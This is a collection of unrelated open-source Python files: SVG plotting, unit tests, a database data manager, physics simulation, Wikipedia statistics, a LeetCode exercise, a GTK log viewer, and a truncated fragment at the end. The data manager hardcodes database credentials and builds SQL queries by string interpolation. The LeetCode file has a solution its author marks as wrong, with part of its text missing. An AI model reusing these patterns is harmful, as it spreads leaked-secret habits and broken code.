self.text(x-.5*pad/self.xscale,y-.5*pad/self.yscale,0,label,stroke_width=\".3pt\",text_anchor='end')\n\n\t\t\n### some functions independent of svg_class\n\t\nif pyvers<3: #long integers are hi-res svg coordinates\n\tdef hires(x): #converts svg (pts) coordinates to hi-res coordinate type\n\t\treturn long(100*x)\nelse: #Python version 3.0 no longer supports long integers\n\tdef hires(x): #converts svg (pts) coordinates to hi-res coordinate type\n\t\treturn(fractions.Fraction(int(x*100),100))\n\n#following is from \n# http://www.ubookcase.com/book/Oreilly/Python.Cookbook.2nd.edition/0596007973/pythoncook2-chp-4-sect-6.html\n# changed name flatten -> flattn to avoid namespace conflicts\n#-----\ndef list_or_tuple(x):\n\treturn isinstance(x, (list, tuple))\ndef flattn(sequence, to_expand=list_or_tuple):\n\tfor item in sequence:\n\t\tif to_expand(item):\n\t\t\tfor subitem in flattn(item, to_expand):\n\t\t\t\tyield subitem\n\t\telse:\n\t\t\tyield item\n#-----\n\ndef rgbstring(*colors): \n\tif colors:\n\t\tf=colors[0]\n\t\tif isinstance(f,list) or isinstance(f,tuple):\n\t\t\tr,g,b=f\n\t\telif len(colors)==3: r,g,b=colors\n\t\telse: r,g,b=colors[0],colors[0],colors[0]\n\telse:\n\t\tr,g,b=0,0,0\n\tif isinstance(r,float): r=255.*r\t\n\tif isinstance(g,float): g=255.*g\t\n\tif isinstance(b,float): b=255.*b\t\n\treturn \"rgb(%d,%d,%d)\" % (r,g,b)\n\ndef stylestring(**k): \n\ts=\"\"\n\tfor key in k.keys():\n\t\ts+=key.replace('_','-')+':'+str(k[key])+';'\n\treturn s\n\ndef SVGtest():\n\timport simpleSVG \n\tsys.stdout.write(\"A sample plot will be output as testSVG.svg\\n\")\n\ta=simpleSVG.svg_class(fname='testSVG.svg',bbx=600,bby=600) #override defaults for bbx and bby\n\ta.scale() #uses default scaling of coordinates 
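# --- Usage sketch for the flattn() generator defined above (restated so the
# snippet runs standalone): depth-first expansion of nested lists/tuples,
# which is how poly()/draw() accept coordinates as numbers, pairs, or a mix.
def _flattn(seq):
    for item in seq:
        if isinstance(item, (list, tuple)):
            for sub in _flattn(item):
                yield sub
        else:
            yield item

assert list(_flattn(['M', [150, 400], 'l', (50, 50)])) == ['M', 150, 400, 'l', 50, 50]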
(x=0. to x=1.0, y=0. to y=1.0) \n\ta.group(fill='black')#otherwise fonts are hollow\n\ta.yaxis()\n\ta.xaxis(dx=.2,form='%9.2e')\n\ta.group()\n\tmypath=a.pathdata('M',[150,400],'l',(50,50),'l',-50,50,'l',-50,-50,'l',50,-50,'Z') #optional use of [] and ()\n\tmystyle=stylestring(stroke=\"olive\",fill=\"#49bab6\",stroke_width=10) #two ways to specify colors; note '_' replaces '-' in SVG parameters\n\ta.path(d=mypath,style=mystyle) # render the path\n\tcolor1='rgb(100,150,200)' #third way to define color \n\tcolor2=rgbstring(.6,.7,200) #fourth way, real numbers will be multiplied by 255\n\ta.path('M',200,300,'l',50,50,'l',-50,50,'l',-50,-50,'l',50,-50,'Z',\n\t\tfill=color1,stroke=color2,stroke_width=5) # make path from positional arguments, make a style string from keyword arguments\n\t# if style= is passed, it will prepend the style string made from keyword arguments:\n\ta.circle(.5,.3,20,style=mystyle,stroke='none')\n\ta.line(.5,.5,.4,.5)\n\ta.group(stroke_width=5) #apply this style to all items in the group\n\ta.line(.5,.5,.4,.6)\n\ta.line(300,simpleSVG.hires(300.23),.5,.6,stroke=\"lime\") #demonstrates using a hi-res coordinate\n#\ta.line(300,30023L,.5,.6,stroke=\"lime\") # long integers (*100) for hi-res coordinate are deprecated\n\ta.line(300,300,.5,.6,stroke=\"lime\") #same central starting point, specified two ways in SVG coords\n\ta.path('M',300,300,'l',.1,.1,stroke=\"red\",stroke_dasharray='3,2') #a line is easily made from path too\n\ta.fatarrow(.5,.5,.7,.5,10,fill='green',stroke='none') #arrow is like line, but with a headsize\n\ta.arrow(.5,.5,.7,.4,10,stroke_width=3,stroke='maroon',fill='black') #fill is for the head\n\ta.group()\n\ta.path('M',.7,.1,'l',.1,.1,.0,.1,-.1,.1,'Z',fill='gray',stroke='none') #path closed with 'Z ' makes polygon\n\ta.poly(.9,.1,1.,.2,1.,.3,.9,.4,fill='silver',stroke='none') #same poly as above, shifted. Must use abs. 
coords.\n\ta.draw(.9,.1,1.,.2,1.,.3,.9,.4,stroke_width=3) #draw is similar to poly, but not closed\n\ta.arc(.8,.65,30,20,180,stroke='brown',stroke_width=10) #arc has radius 30, spans angle 20 to 180\n\ta.arc(.8,.65,60,20,245,stroke='purple',stroke_width=15) #arc had radius 60, spans angle 20 to 245\n\ta.radial(.8,.65,60,80,132.5,stroke='purple',stroke_width=15) #draw radial from radius of 60 to 80, at angle 132.5\n\ta.sector(.7,.85,30,100,10,45,fill='red',stroke='black') #sector has radii 30 and 100, spans angle 10 to 45\n\ta.rect(.7,.8,.35,.25,fill='none',stroke='aqua',stroke_width=3) #specify with width and height\n\ta.rect2(.72,.82,1.03,1.03,fill='none',stroke='yellow',stroke_width=5) #specify with two opposite vertices\n\ta.text(.2,.1,0,'hello',font_size=\"60pt\",fill=\"lime\")\n\ta.text(.5,.3,60,'again',font_size=\"48pt\",text_anchor='middle') #rotate text by 60 degrees, place middle of text at x,y\n\ta.group(fill='black')\n\ta.windbarb(.05,.95,0,40,50,stroke_width=1) #x,y,speed,dir,size\n\ta.windbarb(.10,.90,7,30,50,stroke_width=1)\n\ta.windbarb(.15,.85,47,20,50,stroke_width=1)\n\ta.windbarb(.20,.80,107,10,80,stroke_width=1)\n\ta.group()\n\ta.group(clip_path=r'url(#marginmask)')\n\ta.text(.5,.85,60,'clipped',font_size=\"24pt\",text_anchor='left') #demonstrates clipping\n\ta.group()\n\ta.text(.35,.80,60,' not clipped',font_size=\"24pt\",text_anchor='left') \n\ta.close()\n\ta.display()\n\t\nif __name__=='__main__':\n\tSVGtest()\n","repo_name":"bfiedler/simpleSVG","sub_path":"simpleSVG.py","file_name":"simpleSVG.py","file_ext":"py","file_size_in_byte":19789,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"30"} +{"seq_id":"19827014187","text":"import unittest\nfrom cvs_commit import CommitIndex\n\n\nclass TestCommitIndex(unittest.TestCase):\n def setUp(self) -> None:\n self.index = CommitIndex()\n self.index.new = ['a\\\\b.txt', 'p.txt', 'a\\\\v\\\\m.txt']\n self.index.edited = ['a\\\\c.txt', 's.txt']\n self.index.deleted = ['a\\\\v\\\\p.txt']\n\n def testAllFiled(self):\n expected = {'a\\\\b.txt', 'p.txt', 'a\\\\v\\\\m.txt',\n 'a\\\\c.txt', 's.txt', 'a\\\\v\\\\p.txt'}\n result = self.index.all_files\n self.assertEqual(expected, set(result))\n\n def testGetDirs(self):\n expected = {'a', 'a\\\\v'}\n result = self.index.get_dirs()\n self.assertEqual(expected, result)\n\n def testContains(self):\n item = 'a\\\\v\\\\p.txt'\n self.assertTrue(item in self.index)\n\n def testNotContains(self):\n item = 'a\\\\v\\\\z.txt'\n self.assertFalse(item in self.index)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"KuchinStepan/CVS","sub_path":"tests/test_cvs_commit_index.py","file_name":"test_cvs_commit_index.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"71304482966","text":"from ast import literal_eval as make_tuple\nfrom typing import List, Set, Tuple\nfrom multiprocessing import Lock\nimport psycopg2\nimport copy\nimport pymongo\nfrom .data_manager_interface import DataManagerInterface\n\nclass DataManager(DataManagerInterface):\n def __init__(self):\n super().__init__()\n\n self._camera_station_frames = {}\n self._camera_weight_frames = {}\n self._camera_infos = {} #{id : [names, args]}\n self._station_cameras = {} #{station_id : [camera_id]}\n self._exercises = {}\n self._station_exercises = {}\n\n try:\n self._connection = psycopg2.connect(user=\"trainerai\",\n password=\"esel1212\",\n host=\"127.0.0.1\",\n port=\"5432\",\n 
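# --- The CVS tests above pin down CommitIndex behaviour without showing the
# class. A hypothetical minimal implementation consistent with those tests
# (the real cvs_commit.CommitIndex may differ):
class CommitIndexSketch:
    def __init__(self):
        self.new, self.edited, self.deleted = [], [], []

    @property
    def all_files(self):
        return self.new + self.edited + self.deleted

    def get_dirs(self):
        dirs = set()
        for path in self.all_files:
            parts = path.split('\\')[:-1]          # drop the file name
            for i in range(1, len(parts) + 1):     # every ancestor directory
                dirs.add('\\'.join(parts[:i]))
        return dirs

    def __contains__(self, item):
        return item in self.all_files

idx = CommitIndexSketch()
idx.new = ['a\\b.txt', 'p.txt', 'a\\v\\m.txt']
idx.edited = ['a\\c.txt', 's.txt']
idx.deleted = ['a\\v\\p.txt']
assert idx.get_dirs() == {'a', 'a\\v'}
assert 'a\\v\\p.txt' in idx and 'a\\v\\z.txt' not in idx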
database=\"trainerai_db\")\n self._cursor = self._connection.cursor()\n except psycopg2.Error as error:\n raise RuntimeError('Failed to open database') from error\n\n self._update_frames()\n self._update_camera_infos()\n self._update_station_camera()\n self._load_station_exercises()\n self._mongo_is_on = self._load_exercises()\n\n self._frame_mutex = Lock()\n self._camera_info_mutex = Lock()\n self._station_camera_mutex = Lock()\n self._postgres_mutex = Lock()\n\n def __del__(self):\n print(\"close data manager\")\n self._cursor.close()\n self._connection.close()\n\n def _load_exercises(self):\n mongo_client = pymongo.MongoClient(\"mongodb://mongoadmin:secret@localhost:27888/?authSource=admin\", serverSelectionTimeoutMS=2000)\n if mongo_client is None:\n return False\n db = mongo_client.trainerai\n exercises = db.exercises\n x = exercises.find()\n self._exercises = {}\n for data in x:\n try:\n self._exercises[int(data[\"name\"])] = data[\"description\"]\n except:\n pass\n return True\n\n def _load_station_exercises(self):\n select_query = 'select \"stationId\", \"exerciseId\" from exercises'\n try:\n self._cursor.execute(select_query)\n mobile_records = self._cursor.fetchall()\n exercise_list = {}\n for row in mobile_records:\n print(row)\n if row[0] not in exercise_list:\n exercise_list[row[0]] = []\n exercise_list[row[0]].append(row[1])\n self._station_exercises = exercise_list\n except psycopg2.Error as error:\n raise RuntimeError(\"Error while fetching station exercises from PostgreSQL\") from error\n\n def _update_frames(self):\n try:\n select_query = 'SELECT camera_station_mappings.id, camera_station_mappings.\"cameraId\", ' + \\\n 'camera_station_mappings.\"stationId\", frames.frame_box, frames.type ' + \\\n 'FROM camera_station_mappings ' + \\\n 'LEFT JOIN frames ON camera_station_mappings.id = frames.\"cameraStationMappingId\";'\n\n self._cursor.execute(select_query)\n table = self._cursor.fetchall()\n\n for row in table:\n if row[4] == 0:\n frames = self._camera_station_frames\n else:\n frames = self._camera_weight_frames\n\n if row[1] not in frames:\n frames[row[1]] = {}\n\n if row[3] is not None:\n box_size = make_tuple(\"(\" + row[3] + \")\")\n frame_list = [box_size[1][0], box_size[1][1], box_size[0][0], box_size[0][1]]\n if row[4] == 0:\n frames[row[1]][row[2]] = frame_list\n elif row[4] == 1:\n if row[2] not in frames[row[1]]:\n frames[row[1]][row[2]] = []\n frames[row[1]][row[2]].append(frame_list)\n else:\n frames[row[1]][row[2]] = [0, 0, 1280, 720]\n\n #print(self._camera_station_frames)\n #print(self._camera_weight_frames)\n except psycopg2.Error as error:\n print(\"Error while fetching frame data from PostgreSQL\", error)\n\n def _update_camera_infos(self):\n try:\n select_query = 'SELECT cameras.id, cameras.name, cameras.type, cameras.\"typeInfo\" ' + \\\n \"FROM cameras;\"\n\n self._cursor.execute(select_query)\n table = self._cursor.fetchall()\n\n for row in table:\n self._camera_infos[row[0]] = [row[1], row[2], row[3]]\n\n\n except psycopg2.Error as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\n def _update_station_camera(self):\n try:\n select_query = 'SELECT id, \"cameraId\", \"stationId\" FROM camera_station_mappings'\n self._cursor.execute(select_query)\n mobile_records = self._cursor.fetchall()\n\n station_cameras = {}\n for row in mobile_records:\n if row[2] not in station_cameras:\n station_cameras[row[2]] = []\n station_cameras[row[2]].append(row[1])\n self._station_cameras = station_cameras\n except psycopg2.Error as error:\n 
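# --- Sketch of the frame-box decoding in _update_frames() above: the
# Postgres frame_box column apparently stores text like "(x1,y1),(x2,y2)"
# (an assumption inferred from the wrapping and indexing below); the code
# wraps it in outer parentheses, parses it with ast.literal_eval, then
# reorders the coordinates.
from ast import literal_eval as make_tuple

row_frame_box = "(0,0),(1280,720)"      # hypothetical column value
box_size = make_tuple("(" + row_frame_box + ")")
frame_list = [box_size[1][0], box_size[1][1], box_size[0][0], box_size[0][1]]
assert frame_list == [1280, 720, 0, 0]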
raise RuntimeError(\"Error while fetching station/cameras from PostgreSQL\") from error\n\n def get_weight_colors(self, camera_id : int, station_id : int):\n with self._postgres_mutex:\n try:\n select_query = 'SELECT station_weight_colors.id, name, weight, hsv_low, hsv_high, \"cameraStationMappingId\" ' + \\\n 'FROM camera_station_mappings ' + \\\n 'INNER JOIN station_weight_colors ON camera_station_mappings.id=station_weight_colors.\"cameraStationMappingId\" ' + \\\n f'WHERE camera_station_mappings.\"cameraId\"={camera_id} and camera_station_mappings.\"stationId\"={station_id};'\n self._cursor.execute(select_query)\n mobile_records = self._cursor.fetchall()\n data = {}\n for record in mobile_records:\n data[record[0]] = [record[1], record[2], record[3], record[4], record[5]]\n return data\n except psycopg2.Error as error:\n raise RuntimeError(\"Error while inserting data into weight color\") from error\n\n def get_station_names(self):\n with self._postgres_mutex:\n try:\n select_query = 'SELECT id, name FROM stations;'\n self._cursor.execute(select_query)\n table = self._cursor.fetchall()\n station_names = {}\n for row in table:\n station_names[row[0]] = row[1]\n except psycopg2.Error as error:\n print(\"Error while fetching stations data from PostgreSQL\", error)\n return station_names\n\n def get_station_frame_list(self, camer_id : int):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_station_frames[camer_id])\n return val\n\n def get_station_frame_lists(self):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_station_frames)\n return val\n\n def get_weight_frame_list(self, camer_id : int):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_weight_frames[camer_id])\n return val\n\n def get_weight_frame_lists(self):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_weight_frames)\n return val\n\n def get_camera_name(self, id : int) -> str:\n with self._camera_info_mutex:\n return self._camera_infos[id][0]\n\n def get_camera_names(self) -> List[str]:\n with self._camera_info_mutex:\n camera_names = [info[0] for info in self._camera_infos.values()]\n return camera_names\n\n def get_camera_names_and_indices(self) -> List[Tuple[str, int]]:\n with self._camera_info_mutex:\n camera_indices = [(info[0], index) for index, info in self._camera_infos.items()]\n return camera_indices\n\n def get_camera_id(self, camera_name : str) -> int:\n with self._camera_info_mutex:\n print(self._camera_infos)\n for index, info in self._camera_infos.items():\n if info[0] == camera_name:\n return index\n return -1\n\n def get_camera_type(self, camera_id : int) -> int:\n with self._camera_info_mutex:\n return self._camera_infos[camera_id][1]\n\n def get_camera_type_info(self, camera_id : int) -> str:\n with self._camera_info_mutex:\n return self._camera_infos[camera_id][2]\n\n def get_cameras_of_station(self, station_id : int):\n with self._station_camera_mutex:\n return copy.deepcopy(self._station_cameras[station_id])\n\n def get_stations(self) -> Set:\n station_set = set(s for s in self._station_cameras.keys())\n return station_set\n\n def is_mongo_on(self):\n return self._mongo_is_on\n\n def get_exercises(self):\n return copy.deepcopy(self._exercises)\n\n def get_exercises_on_station(self, station_id : int):\n return 
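# --- The getters above all follow one pattern: take the mutex, deepcopy the
# shared structure, hand back the copy, so callers can mutate freely while
# background refreshes keep writing the original. Distilled:
import copy
from multiprocessing import Lock

class SafeCache:
    def __init__(self):
        self._data = {}
        self._mutex = Lock()

    def get_snapshot(self):
        with self._mutex:                      # block concurrent writers
            return copy.deepcopy(self._data)   # caller gets an isolated copy

cache = SafeCache()
snap = cache.get_snapshot()
snap['station'] = [1, 2]                       # mutating the copy...
assert cache.get_snapshot() == {}              # ...never touches shared state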
copy.deepcopy(self._station_exercises[station_id])\n","repo_name":"tedseb/RWTH-UKA-Pose-estimation","sub_path":"src/station_manager/src/data_manager/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":9330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"17927384530","text":"import numpy as np\n\n# methods and procedures for creating various chains\nclass atomic_state(object):\n def __init__(self, pos, campl):\n\n self.noa = pos.shape[1]\n self._mpos = np.asarray(pos, dtype=np.float64)\n self.dim = self.noa + 2 * self.noa * (self.noa - 1)\n\n #not shuffled; run atomic_state.shuffle() for shuffling\n self.pos = self._mpos\n\n if not np.vdot(campl, campl) == 0:\n self.campl = campl / np.vdot(campl, campl)\n else:\n self.campl = campl\n\n if pos.shape[0] != 3:\n raise TypeError(\"Something wrong with the atomic state\")\n\n def __add__(self, other):\n return self.merge_atomic_states(other, distance=0)\n\n def shuffle(self):\n self.pos = self._mpos\n from .dyson_solvers import sxy, sz\n self.pos[0] += np.random.normal(0.0, sxy, self.noa)\n self.pos[1] += np.random.normal(0.0, sxy, self.noa)\n self.pos[2] += np.random.normal(0.0, sz, self.noa)\n\n def illuminate(self, V):\n amps = V(*self.pos)\n dim = self.noa + 2 * self.noa * (self.noa - 1)\n self.campl = np.zeros(dim, dtype=np.complex)\n for i in range(self.noa):\n self.campl[i] = amps[i]\n\n\n def merge_atomic_states(self, bstate: object, distance=0) -> object:\n n1, n2 = self.noa, bstate.noa\n add_dist = 0\n zpos = np.concatenate((self._mpos, bstate._mpos + distance + add_dist), axis=None)\n campl = np.concatenate((self.campl, np.exp(2j * (distance + add_dist) * np.pi) * bstate.campl), axis=None)\n return atomic_state(zpos, campl)\n\n\n# Create an atomic cloud around center\ndef new_cloud(noa:int):\n xpos = np.zeros(noa)\n ypos = np.zeros(noa)\n zpos = np.zeros(noa)\n\n poss = np.stack((xpos, ypos, zpos), axis=0)\n campl = np.ones_like(zpos, dtype=np.complex)\n\n return atomic_state(poss, campl)\n\n\n# Create a simple chain of noa atoms with period d\ndef new_chain(noa: int, d, random=False):\n xpos = np.zeros(noa)\n ypos = np.zeros(noa)\n zpos = d * (np.arange(noa) - (noa-1)/2.)\n\n poss = np.stack((xpos, ypos, zpos), axis=0)\n campl = np.ones_like(zpos, dtype=np.complex)\n\n return atomic_state(poss, campl)\n\n","repo_name":"ViacheslavP/FS_scattering","sub_path":"novelfss/atomic_states.py","file_name":"atomic_states.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"70045506646","text":"# coding: utf-8\nfrom pprint import pprint\nfrom collections import OrderedDict, defaultdict\nfrom getpass import getpass\nimport multiprocessing as mp\nimport argparse, sys, os, time, json, subprocess, re, itertools, random\nfrom common import str2bool, timewatch, multi_process\n\ntry:\n import pickle as pickle\nexcept:\n import pickle\n\n\n@timewatch\ndef read_triples(triples_path, max_rows):\n triples = defaultdict(str)\n forwards = defaultdict(list)\n backwards = defaultdict(list)\n for i, l in enumerate(open(triples_path)):\n if max_rows and i >= max_rows:\n break\n s, r, o = l.replace('\\n', '').split('\\t')\n triples[(s, o)] = r\n forwards[s].append((r, o))\n backwards[o].append((s, r))\n return triples, forwards, backwards\n\n@timewatch\ndef read_articles(articles_path, max_rows):\n articles = OrderedDict()\n for i, l in enumerate(open(articles_path)):\n 
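# --- Sketch of the chain geometry built by new_chain() above: z positions
# are spaced by d and centred on the origin, stacked into a (3, noa) array
# of x/y/z rows. (np.complex used in the original is the alias NumPy removed
# in 1.24; plain complex works in its place.)
import numpy as np

def chain_positions(noa, d):
    z = d * (np.arange(noa) - (noa - 1) / 2.)   # centred, period d
    return np.stack((np.zeros(noa), np.zeros(noa), z), axis=0)

pos = chain_positions(5, 0.5)
assert pos.shape == (3, 5)
assert abs(pos[2].sum()) < 1e-12                # centred on the origin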
if max_rows and i >= max_rows:\n break\n article = json.loads(l)\n qid = article['qid']\n articles[qid] = article\n return articles\n\n@timewatch\ndef count_triples_in_article(articles, triples, forwards, backwards):\n num_all_triples = 0\n num_mentions_related_triples = 0\n num_mentions_unrelated_triples = 0\n\n\n # Whether a triple is mentioned in an article.\n mentioned_in_article = defaultdict(bool)\n mentioned_out_of_article = defaultdict(bool)\n for s, o in triples.keys():\n mentioned_in_article[(s, o)] = False\n mentioned_out_of_article[(s, o)] = False\n \n for a_qid, article in articles.items():\n related_triples = [(a_qid, r, o) for r, o in forwards[a_qid]] + [(s, r, a_qid) for s, r in backwards[a_qid]] # triples related to a_qid and registered in wikidata\n in_article_related_triples = [] # triples related to a_qid and l_qid (the entity appearing the article).\n for l_qid in article['link']:\n rel = triples[(a_qid, l_qid)]\n if rel:\n in_article_related_triples.append((a_qid, rel, l_qid))\n\n rel = triples[(l_qid, a_qid)]\n if rel:\n in_article_related_triples.append((l_qid, rel, a_qid))\n\n for (s, r, o) in in_article_related_triples:\n mentioned_in_article[(s, o)] = True\n\n in_article_unrelated_triples = []\n for (s, o) in list(itertools.combinations(article['link'].keys(), 2)):\n rel = triples[(s, o)]\n if rel:\n in_article_unrelated_triples.append((s, rel, o))\n mentioned_out_of_article[(s, o)] = True\n\n num_mentions_unrelated_triples += len(in_article_unrelated_triples)\n\n num_all_triples += len(related_triples) # number of all the triples should be that of the entities which have an article about themselves.\n\n num_mentions_related_triples += len(in_article_related_triples)\n if len(related_triples) and (len(in_article_related_triples) or len(in_article_unrelated_triples)):\n related_triples = ' '.join(str(t) for t in related_triples)\n in_article_related_triples = ' '.join(str(t) for t in in_article_related_triples)\n in_article_unrelated_triples = ' '.join(str(t) for t in in_article_unrelated_triples)\n print ('All Triples (%s):\\t' % (a_qid), related_triples)\n print ('Related triples in article (%s):\\t' % (a_qid), in_article_related_triples)\n print ('Other triples in article (%s):\\t' % (a_qid), in_article_unrelated_triples)\n\n print ('')\n print('# all triples : %d' % num_all_triples )\n print('# mentions about the triples of main entities: %d' % num_mentions_related_triples)\n print('# mentions about the triples of sub entities: %d' % num_mentions_unrelated_triples )\n if num_all_triples:\n coverage = 100.0 * len([1 for v in mentioned_in_article.values() if v == True]) / num_all_triples\n print('Coverage of article-related triples : %.2f%%' % (coverage))\n coverage = 100.0 * len([1 for v in mentioned_out_of_article.values() if v == True]) / num_all_triples\n print('Coverage of article-unrelated triples: %.2f%%' % (coverage))\n return\n\n\n@timewatch\ndef main(args):\n #\n triples, forwards, backwards = read_triples(args.wd_source_path, args.wd_max_rows)\n #\n articles = read_articles(args.wp_source_path, args.wp_max_rows)\n count_triples_in_article(articles, triples, forwards, backwards)\n\nif __name__ == \"__main__\":\n desc = ''\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('-wp', '--wp_source_path', default='wikipedia/latest/extracted/dumps.p1s0/pages.all.jsonlines')\n parser.add_argument('-wd', '--wd_source_path', default='wikidata/latest/extracted/all.bak/triples.txt')\n parser.add_argument('-wpm', '--wp_max_rows', 
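# --- The "unrelated triple" scan above checks every unordered pair of
# entities linked from an article against the triple store; defaultdict(str)
# makes missing pairs falsy. Distilled with toy QIDs (made up for the demo):
import itertools
from collections import defaultdict

triples = defaultdict(str)
triples[('Q1', 'Q2')] = 'P31'

links = ['Q1', 'Q2', 'Q3']
mentioned = [(s, triples[(s, o)], o)
             for s, o in itertools.combinations(links, 2)
             if triples[(s, o)]]
assert mentioned == [('Q1', 'P31', 'Q2')]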
default=None, type=int)\n parser.add_argument('-wdm', '--wd_max_rows', default=None, type=int)\n args = parser.parse_args()\n main(args)\n\n# All triples: 97511494\n# All articles: 2303363\n","repo_name":"jack-and-rozz/wikipedia-scripts","sub_path":"supplemental/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"8175225469","text":"'''\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\n\nYou want to maximize your profit by choosing a single day to buy one stock and choosing a different day in the future to sell that stock.\n\nReturn the maximum profit you can achieve from this transaction. If you cannot achieve any profit, return 0.\n'''\n\n'''\nslide window recipe: initial result,initial the beginning of the window,, then for+if/while\nSliding window uses one pointer and one variable for the window size to find a window within the sequence.\n'''\n# Joanna solution. It's wrong. \ndef bestTimeBuyStock(arr):\n maxProfit=0 #initial result\n l=0 #initial the beginning of the window,\n for l in range(len(arr)): #update the pointer to a new location\n for r in range(len(arr)):\n while arr[r] int:\n res = 0\n l = arry[0]\n for r in arry:\n if r < l:\n l = r\n res = max(res, r - l)\n return res\n\ndef main():\n print(bestTimeBuyStock([7,1,5,3,6,4]))\n print(maxProfit([7,1,5,3,6,4]))\n#[3,2,12,6], \n\nif __name__=='__main__':\n main()\n\n","repo_name":"joanna-shu-wu/LeetCode","sub_path":"python/Slide Window/bestTimeBuyStock.py","file_name":"bestTimeBuyStock.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6660419225","text":"import gtk\nimport os\nfrom cylc.gui.tailer import Tailer\nfrom cylc.gui.warning_dialog import warning_dialog\nimport pango\n\n\nclass logviewer(object):\n def __init__(self, name, dirname, filename):\n self.name = name\n self.dirname = dirname\n self.filename = filename\n self.t = None\n\n self.find_current = None\n self.find_current_iter = None\n self.search_warning_done = False\n\n self.freeze_button = None\n self.log_label = None\n self.logview = None\n self.hbox = None\n self.vbox = None\n self.create_gui_panel()\n self.logview.get_buffer()\n\n self.connect()\n\n def clear_and_reconnect(self):\n self.t.stop()\n self.clear()\n self.connect()\n\n def clear(self):\n logbuffer = self.logview.get_buffer()\n s, e = logbuffer.get_bounds()\n logbuffer.delete(s, e)\n\n def path(self):\n if self.dirname and not os.path.isabs(self.filename):\n return os.path.join(self.dirname, self.filename)\n else:\n return self.filename\n\n def connect(self):\n self.t = Tailer(self.logview, self.path())\n self.t.start()\n\n def quit_w_e(self, w, e):\n self.t.stop()\n\n def quit(self):\n self.t.stop()\n\n def get_widget(self):\n return self.vbox\n\n def reset_logbuffer(self):\n # clear log buffer iters and tags\n logbuffer = self.logview.get_buffer()\n s, e = logbuffer.get_bounds()\n logbuffer.remove_all_tags(s, e)\n self.find_current_iter = None\n self.find_current = None\n\n def enter_clicked(self, e, tv):\n self.on_find_clicked(tv, e)\n\n def on_find_clicked(self, tv, e):\n needle = e.get_text()\n if not needle:\n return\n\n self.t.freeze = True\n self.freeze_button.set_active(True)\n self.freeze_button.set_label('Reconnect')\n if not self.search_warning_done:\n warning_dialog(\n \"Find Next disconnects the 
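# --- In the buy/sell record above, the text between "arr[r]" and "int:" was
# lost (apparently eaten as an HTML tag around the '<' comparison), and the
# first solution is flagged wrong by its own comment. A corrected O(n^2)
# brute force for reference; the surviving one-pass logic (track the running
# minimum, widen the best gap) is the O(n) answer:
def brute_force_profit(arr):
    best = 0
    for l in range(len(arr)):
        for r in range(l + 1, len(arr)):    # sell strictly after buying
            best = max(best, arr[r] - arr[l])
    return best

assert brute_force_profit([7, 1, 5, 3, 6, 4]) == 5
assert brute_force_profit([7, 6, 4, 3, 1]) == 0    # falling prices: no trade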
live feed;\" +\n \" click Reconnect when you're done\").warn()\n self.search_warning_done = True\n\n tb = tv.get_buffer()\n\n if needle == self.find_current:\n s = self.find_current_iter\n else:\n s, e = tb.get_bounds()\n tb.remove_all_tags(s, e)\n s = tb.get_end_iter()\n tv.scroll_to_iter(s, 0)\n try:\n start, end = s.backward_search(needle, gtk.TEXT_SEARCH_TEXT_ONLY)\n except TypeError:\n # No search results.\n warning_dialog('\"' + needle + '\"' + \" not found\").warn()\n else:\n tag = tb.create_tag(None, background=\"#70FFA9\")\n tb.apply_tag(tag, start, end)\n self.find_current_iter = start\n self.find_current = needle\n tv.scroll_to_iter(start, 0)\n\n def freeze_log(self, b):\n # TODO - HANDLE MORE STUFF IN THREADS LIKE THIS, RATHER THAN\n # PASSING IN ARGUMENTS?\n if b.get_active():\n self.t.freeze = True\n b.set_label('Re_connect')\n self.reset_logbuffer()\n else:\n self.t.freeze = False\n b.set_label('Dis_connect')\n\n return False\n\n def create_gui_panel(self):\n self.logview = gtk.TextView()\n self.logview.set_editable(False)\n # Use a monospace font. This is safe - by testing - setting an\n # illegal font description has no effect.\n self.logview.modify_font(pango.FontDescription(\"monospace\"))\n\n searchbox = gtk.HBox()\n entry = gtk.Entry()\n entry.connect(\"activate\", self.enter_clicked, self.logview)\n searchbox.pack_start(entry, True)\n b = gtk.Button(\"Find Next\")\n b.connect_object('clicked', self.on_find_clicked, self.logview, entry)\n searchbox.pack_start(b, False)\n\n self.hbox = gtk.HBox()\n\n self.freeze_button = gtk.ToggleButton(\"Dis_connect\")\n self.freeze_button.set_active(False)\n self.freeze_button.connect(\"toggled\", self.freeze_log)\n\n searchbox.pack_end(self.freeze_button, False)\n\n sw = gtk.ScrolledWindow()\n sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)\n sw.add(self.logview)\n self.logview.set_border_width(5)\n self.logview.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#fff\"))\n\n self.vbox = gtk.VBox()\n\n self.log_label = gtk.Label(self.path())\n self.log_label.modify_fg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#00a\"))\n self.vbox.pack_start(self.log_label, False)\n\n self.vbox.pack_start(sw, True)\n self.vbox.pack_start(searchbox, False)\n self.vbox.pack_start(self.hbox, False)\n","repo_name":"NancyGomez/WebBasedCylc","sub_path":"cylc-7.6.0/lib/cylc/gui/logviewer.py","file_name":"logviewer.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"71437994966","text":"# -*- coding: utf-8 -*-\nfrom sceptre.resolvers import Resolver\nfrom 